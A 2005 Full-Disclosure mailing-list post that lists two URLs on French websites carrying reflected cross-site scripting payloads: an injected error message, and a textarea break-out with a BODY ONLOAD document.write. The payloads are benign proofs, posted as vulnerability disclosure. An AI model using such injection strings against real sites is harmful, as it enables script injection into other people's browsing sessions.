[Full-disclosure] Big Sites That Are Vulnerable To XSS

Jerome ATHIAS jerome.athias at free.fr
Thu Apr 21 07:28:07 BST 2005 

My 2 eurocents:

http://www.multimania.lycos.fr/myaccount/?lsu_ssl=?_loginName=?_loginName=&lsu_err_msg=I%20LOVE%20XSS

http://trans.voila.fr/voila?systran_text=%3C/textarea%3E%3CBODY%20ONLOAD=document.write('I_LIKE_XSS!')%3E

Regards.
Jerome

Full-Disclosure is hosted and sponsored by Secunia.